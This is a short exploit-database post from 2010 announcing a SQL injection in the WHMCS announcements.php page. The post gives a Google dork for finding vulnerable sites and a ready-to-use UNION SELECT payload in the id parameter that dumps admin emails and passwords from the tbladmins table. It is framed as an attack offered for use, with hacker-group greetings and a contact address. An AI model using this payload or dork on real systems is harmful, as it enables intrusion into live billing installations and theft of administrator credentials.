WHMCS Control 2 (announcements.php) SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WHMCS Control 2 (announcements.php) SQL Injection
# Published : 2010-05-02
# Author : Islam DefenDers
# Previous Title : Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability
# Next Title : GuppY v4.5.18 Blind SQL/XPath injection Vulnerability

Software: WHMCS control 2  Sql Injection             
                                                                         
Vulnerability: Remote Sql Injection                                      
Google Dork: Powered by WHMCompleteSolution - or "  inurl:WHMCS   or'     announcements.php   
Off. site: www.MiXaTy.com                                               


Author
Author: Islam DefenDers                            
Date: 2.5.2010                                   
Contact:  email: hackereg@hotmail.com             


Sql Injection
Exploit: http://site/announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--                                        
DOWNLOAD : http://www.whmcs.com/                                                                                
Greetz
IsLam DefenDers Mr.HaMaDa 


HaMaDa SCoOoRPioN 

site: www.mixaty.com

E: hackereg@hotmail.com